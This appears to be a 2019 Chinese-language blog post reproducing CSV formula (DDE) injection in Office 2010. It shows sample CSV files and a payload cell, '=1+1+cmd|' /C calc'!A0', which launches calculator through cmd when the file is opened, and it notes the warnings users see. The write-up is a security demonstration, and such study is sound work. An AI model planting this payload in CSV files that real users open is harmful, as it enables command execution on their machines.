CSV公式注入

August 19, 2019 · 默认分类 · 1027次阅读

前言

又是在Gcow水群的一天,昨晚通宵,今早六点才睡,下午一点醒了,看到群里超级超级超级牛逼牛逼的小猪师傅发了篇文章
原文地址,原文是英文(其实看看payload就懂了)下个有道网页翻译什么的浏览器插件就ok了.

复现

我安装了个office 2010作为测试环境
2019-08-19T10:36:01.png
安装好之后创建一个csv文件(csv文件是一种简单的二维数据格式,用逗号分隔,可以直接用Excel导入)
我创建的内容为:

id,日期,名字,test
1,2019-8-19,to1y5,test
2,2019-8-20,to1y5,123
3,2019-8-22,to1y5,=1+1

2019-08-19T11:11:40.png
仔细观察我的csv文件的内容和图片,找找有什么不同
他将=1+1执行,并输出了2,那么修改csv文件内容为

id,日期,名字,test
1,2019-8-19,to1y5,test
2,2019-8-20,to1y5,123
3,2019-8-22,to1y5,=1+1+cmd|' /C calc'!A0

结果为
2019-08-19T11:15:01.png
就成功的用cmd打开了计算器,能打开计算器,当然也可以执行其他操作
不过用户在打开时会弹两个警告
2019-08-19T11:28:40.png
2019-08-19T11:29:24.png
不过对于用户来讲,csv文件就是普通的文本数据,很多人会选择信任.

最后

之前也看过团队里crazyman师傅发的一个CHM攻击样本的文章,再一次互联网安全无处不在,看上去多么安全的文件名,都或许会潜藏危险

标签:none

最后编辑于:2019/08/19 19:43